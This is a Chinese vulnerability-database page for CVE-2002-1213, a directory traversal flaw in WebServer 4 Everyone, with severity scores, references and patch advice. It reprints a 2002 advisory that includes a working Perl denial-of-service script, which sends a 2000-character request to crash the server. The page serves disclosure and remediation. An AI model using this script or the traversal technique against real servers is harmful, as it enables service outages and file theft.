CVE-2002-1213
CVSS5.0
发布时间 :2002-10-28 00:00:00
修订时间 :2008-09-10 15:14:03
NMCOPS    

[原文]Directory traversal vulnerability in RadioBird Software WebServer 4 Everyone 1.23 and 1.27, and other versions before 1.30, allows remote attackers to read arbitrary files via an HTTP request with ".." (dot-dot) sequences containing URL-encoded forward slash ("%2F") characters.


[CNNVD]WebServer 4 Everyone目录遍历漏洞(CNNVD-200210-312)

        
        WebServer 4 Everyone服务程序是由RadioBird Software开发和维护的功能强大、安装维护方便的WEB服务程序,设计用于Microsoft Windows操作系统。
        WebServer 4 Everyone服务程序对用户提交的包含特殊编码的URL请求缺少正确处理,远程攻击者可以利用这个漏洞进行目录遍历,以WEB进程的权限在系统上查看任意文件内容。
        WebServer 4 Everyone服务程序对以十六进制(%2F)代表"/"字符的WEB请求缺少正确过滤,攻击者提交包含多个(%2F)的WEB请求以WEB进程的权限在系统上查看任意文件内容。包括如WinNT中的sam文件,造成敏感信息泄露。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:radiobird_software:webserver_4_all:1.23
cpe:/a:radiobird_software:webserver_4_all:1.27

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1213
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1213
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-312
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5968
(UNKNOWN)  BID  5968
http://www.iss.net/security_center/static/10373.php
(VENDOR_ADVISORY)  XF  webserver-4everyone-encoded-traversal(10373)
http://www.idefense.com/application/poi/display?id=49&type=vulnerabilities&flashstatus=true
(UNKNOWN)  IDEFENSE  20021014 DoS and Directory Traversal Vulnerabilities in WebServer 4 Everyone

- 漏洞信息

WebServer 4 Everyone目录遍历漏洞
中危 输入验证
2002-10-28 00:00:00 2005-10-20 00:00:00
远程  
        
        WebServer 4 Everyone服务程序是由RadioBird Software开发和维护的功能强大、安装维护方便的WEB服务程序,设计用于Microsoft Windows操作系统。
        WebServer 4 Everyone服务程序对用户提交的包含特殊编码的URL请求缺少正确处理,远程攻击者可以利用这个漏洞进行目录遍历,以WEB进程的权限在系统上查看任意文件内容。
        WebServer 4 Everyone服务程序对以十六进制(%2F)代表"/"字符的WEB请求缺少正确过滤,攻击者提交包含多个(%2F)的WEB请求以WEB进程的权限在系统上查看任意文件内容。包括如WinNT中的sam文件,造成敏感信息泄露。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时使用防火墙限制WebServer 4 Everyone的WEB服务,只允许可信用户访问。
        厂商补丁:
        www.freeware.lt
        ---------------
        下载使用WebServer 4 Everyone 1.30版本:
        ftp://ftp.freeware.lt/anonymous/Soft/w4asetup.exe

- 漏洞信息 (F29868)

webserver4everyone.txt (PacketStormID:F29868)
2002-10-25 00:00:00
Tamer Sahin,David Endler  idefense.com
denial of service,vulnerability
CVE-2002-1212,CVE-2002-1213
[点击下载]

iDEFENSE Security Advisory 10.15.02 - RadioBird Software's WebServer 4 Everyone v1.27 and below contains denial of service and directory traversal vulnerabilities allowing any file on the system to be downloaded. Fix available here.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: MD5

- --[ Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability ]--

- --[ Type

Denial of Service

- --[ Release Date

October 23, 2002

- --[ Product / Vendor

Web Server 4 Everyone is an Internet and Intranet server that supports HTTP Services.
Web Server 4 Everyone is available for Microsoft Windows operating systems.

http://www.freeware.lt/Info/projects.php

- --[ Summary

The problem is Web Server 4 Everyone v1.28 with bounds checking, when you request 2000
characters "web4all.exe"  just shuts down. This vulnerability also affects Web Server 4
Everyone versions prior to v1.28 for Microsoft Windows 2000.

When the attacker send a request in size of 2000 characters in "Host:" field that contains
all "127.0.0.1", the server  crashes. In case you send a request that size without adding
the "Host:" there is no effect on running program. The Web server must be restarted to
regain normal functionality.

- --[ Exploit

An exploit for this vulnerability exists and is available below.

=============== SNIP ===============

#!/usr/bin/perl -w

use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1];
$evil = "A" x 2000;

print "Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host port\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
            new(Proto=>"tcp",
            PeerAddr=>$host,
            PeerPort=>$port)
            || die "Connection failed.\n";

print "Attacking...\n";
print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n";

close($socket);
print "\nConnection closed. Finished.\n\n";

=============== SNIP ===============

- --[ Tested

Windows 2000 Sp3 / Web Server 4 Everyone v1.28
Windows 98 SE / Web Server 4 Everyone v1.28

- --[ Vulnerable

Web Server 4 Everyone v1.28

- --[ Vendor Status

This vulnerability fixed Web Server 4 Everyone v1.32

- --[ Disclaimer

http://www.securityoffice.net is not responsible for the misuse or illegal use of
any of the information and/or the software listed on this security advisory.

- --[ Author

Tamer Sahin
ts@securityoffice.net
http://www.securityoffice.net

All our advisories can be viewed at http://www.securityoffice.net/articles/

Please send suggestions, updates, and comments to feedback@securityoffice.net

(c) 2002 SecurityOffice

This Security Advisory may be reproduced and distributed, provided that this Security
Advisory is not modified in any way and is attributed to SecurityOffice and provided
that such reproduction and distribution is performed for non-commercial purposes.

Tamer Sahin
http://www.securityoffice.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQEVAwUAPbZoQfpL5ibJRTtBAQFQlgf/RK+3BewSrQX6XjB8FjWatCWlEOydKC9I
TB+ULUWKgTOi31J0DFSYTkFQmTLZBt8Z08QHIA3R4KSCRdv9d7UuzkTIcETnwaxO
sDih29SyjysOteW0ikNtRxjQHnZydBqa8v2YRj5iQBnJbirKsPwCL0OPKx17VWZc
9wGiL07gVYVgM7xgARdhkUwXmYLTZk19WCx0ZXBxIyDdl8wTwF9VR6dy33i5vc7C
AIh5CRCS4Z0aYOHt91GF7yrsOZsjppxXMHdiBX5B/F1vJQNMJpxeEd7565NlDdV+
qBUlNkchIYeQt8jLjAlsMC6FQ/9OGrs7Y56UreB9Qj0Ky0xo8sQu+w==
=0MpF
-----END PGP SIGNATURE-----



    

- 漏洞信息

8946
RadioBird WebServer 4 Everyone Encoded Double Dot Traversal Arbitrary File Access
Remote / Network Access Input Manipulation
Loss of Confidentiality Upgrade
Vendor Verified

- 漏洞描述

- 时间线

2002-10-15 Unknow
Unknow 2002-10-15

- 解决方案

Upgrade to version 1.30 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

RadioBird Software WebServer 4 All Directory Traversal Vulnerability
Input Validation Error 5968
Yes No
2002-10-15 12:00:00 2009-07-11 06:06:00
Discovery of this vulnerability credited to Tamer Sahin (ts@securityoffice.net).

- 受影响的程序版本

RadioBird Software WebServer 4 All 1.27
RadioBird Software WebServer 4 All 1.23
RadioBird Software WebServer 4 All 1.30

- 不受影响的程序版本

RadioBird Software WebServer 4 All 1.30

- 漏洞讨论

A vulnerability has been discovered in WebServer 4 All.

It has been reported that WebServer 4 All does not properly sanitize web requests. By sending a malicious web request to the vulnerable server, using URL encoded characters, it is possible for a remote attacker to access sensitive resources located outside of the web root.

Disclosure of sensitive system files may aid the attacker in launching further attacks against the target system.

- 漏洞利用

This issue can be exploited with a web browser.

- 解决方案

The vendor has stated that WebServer 4 All 1.30 is not vulnerable to this issue. Users are advised to upgrade to the newest version of WebServer 4 All:


RadioBird Software WebServer 4 All 1.23

RadioBird Software WebServer 4 All 1.27

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站